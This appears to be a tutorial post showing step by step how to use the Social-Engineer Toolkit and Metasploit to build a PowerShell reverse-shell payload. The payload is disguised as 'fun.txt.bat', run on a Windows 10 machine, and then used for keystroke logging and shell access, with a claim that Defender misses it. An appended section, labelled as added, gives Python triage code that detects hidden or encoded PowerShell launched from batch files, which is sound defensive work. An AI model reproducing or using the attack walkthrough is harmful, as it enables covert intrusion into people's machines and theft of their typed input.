Tool used: Kali Linux
[email protected]:~# setoolkit
Do you agree to the terms of service [y/n]: y
set> 1
set> 9
set:powershell>1
set> IP address for the payload listener (LHOST): 192.168.1.110 (the Kali Linux machine's IP address)
set:powershell> Enter the port for the reverse [443]:443
set> Do you want to start the listener now [yes/no]: : yes
The newly generated virus files:
msf exploit(handler) > ls -ll /root/.set/reports/powershell/
[*] exec: ls -ll /root/.set/reports/powershell/
total 12
-rw-r--r-- 1 root root 128 Mar 7 22:26 powershell.rc
-rw-r--r-- 1 root root 6773 Mar 7 22:26 x86_powershell_injection.txt
Rename x86_powershell_injection.txt to fun.txt.bat.
Transfer fun.txt.bat to the Windows 10 machine and run it.
On Kali you can then see the following:
msf exploit(handler) > [*] Sending stage (957999 bytes) to 192.168.1.94
[*] Meterpreter session 1 opened (192.168.1.110:443 -> 192.168.1.94:50499) at 2017-03-07 22:46:45 -0500
Press Enter.
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 sh-270\slls @ SH-270 192.168.1.110:443 -> 192.168.1.94:50499 (192.168.1.94)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > help
meterpreter > keyscan_start
Starting the keystroke sniffer...
Input typed on the Windows 10 machine can now be captured by Kali, as shown below.
meterpreter > keyscan_dump
Dumping captured keystrokes...
As of today, the Defender built into the latest Windows 10 does not detect this virus.
meterpreter > shell
Process 9424 created.
Channel 1 created.
Microsoft Windows
(c) 2016 Microsoft Corporation
C:\Users\Desktop>dir (logged in successfully)
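
Because Defender raised nothing when fun.txt.bat was run, the following added example (not part of the original post, and not SET or Metasploit code) shows process-creation triage that flags powershell.exe started from a batch file with a hidden window or an encoded command, including abbreviated switch spellings. It assumes the batch file launches PowerShell that way, which this page does not show; the event keys are this example's own and the sample events are constructed.

```python
import base64
import shlex

# canonical powershell.exe switch -> (shortest accepted prefix length, extra aliases)
SWITCHES = {"encodedcommand": (1, ("ec",)), "windowstyle": (1, ()),
            "noprofile": (3, ()), "noninteractive": (3, ())}

def match_switch(token):
    """Return the canonical switch a token abbreviates (-e, -enc, -w, -nop ...), or None."""
    if token[:1] not in ("-", "/"):
        return None
    t = token[1:].lower()
    for name, (min_len, aliases) in SWITCHES.items():
        if t in aliases or (len(t) >= min_len and name.startswith(t)):
            return name
    return None

def inspect(cmdline):
    """Collect the switches used, whether the window is hidden, and the decoded command."""
    tokens = shlex.split(cmdline, posix=False)
    found = {"switches": [], "hidden": False, "decoded": None}
    for i, tok in enumerate(tokens):
        name = match_switch(tok)
        if name is None:
            continue
        found["switches"].append(name)
        arg = tokens[i + 1].strip('"') if i + 1 < len(tokens) else ""
        if name == "windowstyle":
            found["hidden"] = arg.lower() in ("hidden", "1")
        elif name == "encodedcommand":
            try:  # the argument is base64 over UTF-16LE text
                found["decoded"] = base64.b64decode(arg, validate=True).decode("utf-16-le")
            except ValueError:
                found["decoded"] = "<undecodable>"
    return found

def is_suspicious(event):
    """True for powershell.exe started from a batch file with a hidden window or encoded command."""
    if not event["image"].lower().endswith("\\powershell.exe"):
        return False
    found = inspect(event["cmdline"])
    from_batch = any(ext in event["parent_cmdline"].lower() for ext in (".bat", ".cmd"))
    return from_batch and (found["hidden"] or "encodedcommand" in found["switches"])

# Constructed sample events; keys are this example's own, modelled on process-creation logs
_B64 = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"image": _PS, "cmdline": "powershell.exe -nop -w hidden -enc " + _B64,
     "parent_cmdline": r'cmd.exe /c "C:\Users\user\Desktop\fun.txt.bat"'},
    {"image": _PS, "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1",
     "parent_cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]
```

Decoding the -EncodedCommand argument during triage lets an analyst read the script text without running it.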